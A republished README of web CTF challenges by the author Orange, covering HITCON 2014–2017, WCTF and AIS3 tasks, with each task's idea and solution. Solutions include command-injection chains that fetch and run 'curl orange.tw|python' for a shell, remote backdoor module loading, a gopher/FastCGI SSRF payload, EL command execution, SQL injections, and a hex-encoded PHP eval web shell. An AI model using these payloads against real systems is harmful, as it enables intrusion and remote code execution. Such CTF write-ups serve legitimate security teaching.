My CTF Web Challenges
来源:互联网 发布:广西广电网络投诉 编辑:程序博客网 时间:2024/06/06 09:25
My CTF Web Challenges
Hi, I am Orange. This is the repo of CTF challenges I made. It contains challenge's source code, writeup and some idea explanation.
I am a CTFer and Bug Bounty Hunter, loving web hacking and penetration testing. So you will see these challs are all about web. If you have any question about these challs, you can find me in following ways
- orange@chroot.org
- blog.orange.tw
Hope you like it :)
P.s. BTW, the series of Babyfirst
are my favorite in all of these challenges. There are open questions to all and there are lots of creative solutions. If you don't have time to see all, please look the them at least!
- Babyfirst
- Babyfirst Revenge
- Babyfirst Revenge v2
Table of Content
HITCON 2017 Quals
- BabyFirst Revenge
- BabyFirst Revenge v2
- SSRFme?
- SQL so Hard
- Baby^H Master PHP 2017
HITCON 2016 Quals
- %%%
- Leaking
- BabyTrick
- Angry Boy
- Angry Seam
HITCON 2015 Quals
- Babyfirst
- nanana
- Giraffe's Coffee
- lalala
- Use-After-FLEE
HITCON 2014 Quals
- PUSHIN CAT
- PY4H4SHER
- LEENODE
WCTF 2016
- BlackBox
AIS3 Final 2015 Final
- SQLPWN
BabyFirst Revenge
Difficulty: ★☆
Sovled: 95 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 5 bytes
Source Code
- index.php
Solution
# generate `ls -t>g` to file "_"http://host/?cmd=>ls\http://host/?cmd=ls>_http://host/?cmd=>\ \http://host/?cmd=>-t\http://host/?cmd=>\>ghttp://host/?cmd=ls>>_# generate `curl orange.tw|python` to file "g"http://host/?cmd=>onhttp://host/?cmd=>th\http://host/?cmd=>py\http://host/?cmd=>\|\http://host/?cmd=>tw\http://host/?cmd=>e.\http://host/?cmd=>ng\http://host/?cmd=>ra\http://host/?cmd=>o\http://host/?cmd=>\ \http://host/?cmd=>rl\http://host/?cmd=>cu\http://host/?cmd=sh _# got shellhttp://host/?cmd=sh g
You can check the exploit.py for the detail! And there are also lots of creative solutions, you can check the write ups below.
Write Ups
- HITCON CTF 2017-BabyFirst Revenge-writeup
BabyFirst Revenge v2
Difficulty: ★★★★
Sovled: 8 / 1541
Tag: WhiteBox, PHP, Command Injection
Idea
- Command Injection, but only in 4 bytes
Source Code
- index.php
Solution
- generate
g> ht- sl
to filev
- reverse file
v
to filex
- generate
curl orange.tw|python;
- execute
x
,ls -th >g
- execute
g
You can check exploit.py for the detail!
Write Ups
- script.py from @bennofs
SSRFme?
Difficulty: ★★☆
Sovled: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution
Idea
- CVE-2016-1238 (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
- Perl lookup current directory in module importing
- Perl module URI/lib/URI.pm#L136 will
eval
if there is a unknown scheme
Source Code
- index.php
$ sudo apt install libwww-perl
Solution
# write evil URI module to current directory$ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl# eval evil module `orange`$ curl http://host/?filename=xxx&url=orange://orange.tw
Write Ups
TBD
SQL so Hard
Difficulty: ★★★
Sovled: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL,SQL Injection, Code Injection
Idea
- MySQL
max_allowed_packet
dropped large size SQL sentence - Node-Postgres - code execution vulnerability
- Exploit the RCE in SQL
UPDATE
syntax
Source Code
- app.js
Solution
- exploit.py
Write Ups
TBD
Baby^H Master PHP 2017
Difficulty: ★★★★☆
Sovled: 0 / 1541
Tag: WhiteBox, PHP, Serialization,Apache Prefock
Idea
- PHP do the de-serialization on
PHAR
parsing - PHP assigned a predictable function name
\x00lambda_%d
to an anonymous function - Break shared VARIABLE state in Apache Pre-fork mode
Source Code
- index.php
Solution
# get a cookie$ curl http://host/ --cookie-jar cookie# download .phar file from http://orange.tw/avatar.gif$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'# force apache to fork new process$ python fork.py &# get flag$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
- avatar.gif
- fork.py
Write Ups
No one solve it :(
papapa
Difficulty: ★
Sovled: 71 / 1024
Tag: BlackBox, SSL, Pentesting
Idea
- Leak the internal hostname from SSL certificate
Source Code
- here
Solution
$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name"...depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org...# get flag$ curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
Write Ups
- HITCON 2016
- HITCON CTF 2016: %%% (Web) Write-up
- [HITCON 2016] [WEB 100 - %%%] WRITE UP
- hitcon2016 web writeup
Leaking
Difficulty: ★★
Sovled: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS
Idea
- Break JavaScript Sandbox
- Use NodeJS
Buffer(int)
to steal uninitialized memory - Node.js Buffer knows everything
Source Code
- here
Solution
$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;
Write Ups
- Hello HitCon 2016 CTF
- HITCON 2016 web 总结
- hitcon2016 web writeup
BabyTrick
Difficulty: ★★★
Sovled: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize
Idea
- Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization
- SugarCRM v6.5.23 PHP反序列化對象注入漏洞
- MySQL UTF-8 collation -
SELECT 'Ä'='a'
is True
Source Code
- here
Solution
# get passwordcurl http://1.2.3.4/?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}# get flagcurl http://1.2.3.4/?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
Write Ups
- Hitcon 2016 – Baby Trick
- Hello HitCon 2016 CTF
- hitcon2016 web writeup
Angry Boy
Difficulty: ★★☆
Sovled: 43 / 1024
Tag: GrayBox, Java
Idea
new String(new byte[] {1, -1, 1, -1})
will output01EFBFBD01EFBFBD
, not01FF01FF
- When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions
Source Code
- here
Solution
- exploit.py
- decrpt.py
Write Ups
- Angry Boy - Web 300 Problem
Angry Seam
Difficulty: ★★★★
Sovled: 4 / 1024
Tag: GrayBox, Java, Seam Framework,CSS RPO, EL Injection, Java Deserialization
Idea
- CSS Relative Path Overwrite
- Built-in redirection parameter
actionOutcome
- RPO Gadgets
- CVE-2010-1871: JBoss Seam Framework remote code execution
Source Code
- here
Solution
P.s. I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P
Intended solution
Register an account
username: `AAAAAA` password: `AAAAAA` realname: `{/*';*/}%0a@import'http://orange.tw/?`
Report URL
http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA
Unintended solution
- Register an account
- Update description to
- Login and access
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1host: 1.2.3.4cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}ccc: ls -alh...
Unintended solution
- CVE-2013-2165 Java deserialization vulnerability
Unintended solution
- SESSION manipulation... seam SUCKS
Write Ups
- Web500 Hitconctf 2016 and exploit CVE-2013-2165
- Angry Seam (500 pts)
Babyfirst
Sovled: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection
Idea
- Use
NewLine
to bypass regular expression check - Command injection only with alphanumeric characters
Source Code
- here
<?php highlight_file(__FILE__); $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR']; if ( !file_exists($dir) ) mkdir($dir); chdir($dir); $args = $_GET['args']; for ( $i=0; $i<count($args); $i++ ){ if ( !preg_match('/^\w+$/', $args[$i]) ) exit(); } exec("/bin/orange " . implode(" ", $args));?>
Solution
http://localhost/?args[0]=x%0a&args[1]=mkdir&args[2]=orange%0a&args[3]=cd&args[4]=orange%0a&args[5]=wget&args[6]=846465263%0ahttp://localhost/?args[0]=x%0a&args[1]=tar&args[2]=cvf&args[3]=aa&args[4]=orange%0a&args[5]=php&args[6]=aa
And there are also lots of creative solutions, you can check the write ups below.
Write Ups
- babyfirst (web 100)
- HITCON CTF 2015 Web 100 Web 300 Writeup
- HITCON 2015 Quals: Babyexploit
- Babyfirst (web, 100p, ?? solves)
nanana
Difficulty: ★★★
Sovled: 18 / 969
Tag: GrayBox, C, PWN
Idea
- Pwn without library
- Format String without output
- Bypass Stack Guard by using overflow
ARGV[1]
Source Code
- here
Solution
- exploit.py
Write Ups
- nanana (pwn, web 200)
- HITCON 2015 Quals: Nanana
- Pwning (sometimes) with style - Dragons’ notes on CTFs
Giraffe's Coffee
Difficulty: ★★★☆
Sovled: 16 / 969
Tag: WhiteBox, PHP
Idea
- Break PHP PRNG
- Break shared PRNG STATE in Apache Prefork mode
Source Code
- here
Solution
TBD
Write Ups
- HITCON CTF 2015 Web 100 Web 300 Writeup
- Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)
- HITCON 2015 WEB 300
lalala
Difficulty: ★★★☆
Sovled: 2 / 969
Tag: BlackBox, PHP, SSRF
Idea
- Bypass SSRF restrictiton with 302 redirect
- Exploit FASTCGI protocol by using GOPHER
Source Code
- here
Solution
<?phpheader( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );
Write Ups
- HITCON CTF 2015 Web 100 Web 300 Writeup
- Hitcon 2015 lalala web400 task
Use-After-FLEE
Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN
Idea
- Bypass open_basedir
- Bypass disable_functions
- PHP use-after-free exploit writing
- Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
- Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Source Code
- here
Solution
TBD
Write Ups
- Use-After-FLEE (pwn, web 500)
PUSHIN CAT
Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection
Idea
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
- here
Solution
TBD
Write Ups
- HITCON CTF 2014: PUSHIN CAT
- HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)
- HITCON CTF 2014
PY4H4SHER
Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision,HPP
Idea
- Python CGI HTTP Pollution
- MySQL old_password hash collisions
- PBKDF2+HMAC hash collisions explained
Source Code
- here
Solution
TBD
Write Ups
- HITCON CTF 2014: PY4H4SHER
- HITCON CTF 2014: PY4H4SHER WRITEUP
- py4h4sher_solution.py
- HITCON CTF 2014
LEENODE
Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache
Idea
- Multilayered architecture vulnerability
- Double Encoding
Source Code
- here
Solution
# get password$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm# get flag$ curl http://1.2.3.4/admin/thefl4g.txt
Write Ups
- HITCON CTF 2014: LEENODE
- (web) LEENODE [250]
- CTF/Writeup/HITCON2014/LEENODE
BlackBox
Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF
Idea
- Multilayered architecture vulnerability
- Default and up to date mod_jk leads to directory travesal
- Bypass WAF by incorrect usage of BASE64 and URLENCODE
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
Source Code
- here
Solution
Get source code
http://1.2.3.4/login/..;/
Review code and find a way to bypass WAF
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
Write shell
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"$ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'
Write Ups
TBD
SQLPWN
Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection,LFI, Race Condition
Idea
- One-byte off SQL Injection
- Race Condition
- Local file inclusion with PHP session
Source Code
- here
Solution
Run exploit.py to win race condition
Login and SQL Injection
$ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\¬e=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
Local file inclusion with session
$ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220
Write Ups
- AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
- AIS3 CTF Final Web1 & Web2
- My CTF Web Challenges
- CTF-WEB小技俩
- CTF web总结
- CTF-web练习
- D0g3 CTF-WEB
- 实验吧CTF-web
- SniperOJ-CTF练习-web
- 南邮ctf-web-wp
- Web-ctf-StudyNote
- CTF web总结
- ctf-web常用网页
- WEB CTF 西普学院
- CTF web总结(入门)
- 33c3 CTF web WriteUp
- CTF之web这道题很简单
- CTF web题总结--SSRF
- CTF web题总结--unserizable
- CTF web题总结--LFI
- 文章标题
- 大型网站架构之分布式消息队列
- 【中断问题】根据Linux内核的中断处理机制,设计CC2541的中断保护机制
- mysql使用索引, 用存储过程检验
- Eclipse中10个最有用的快捷键组合
- My CTF Web Challenges
- Easyui 加载数据库,页面显示正确日期时间
- 视频编解码理论基础
- 大数据学习笔记-(二)启动集群&配置IDE环境
- Hive中ObjectInspector作用
- android APP调起地图导航(谷歌,高德,百度)工具类
- 动态代理 静态代理 代理模式详解(讲的很好 浅显易懂)
- Springboot 属性配置(三)
- XGBoost详细了解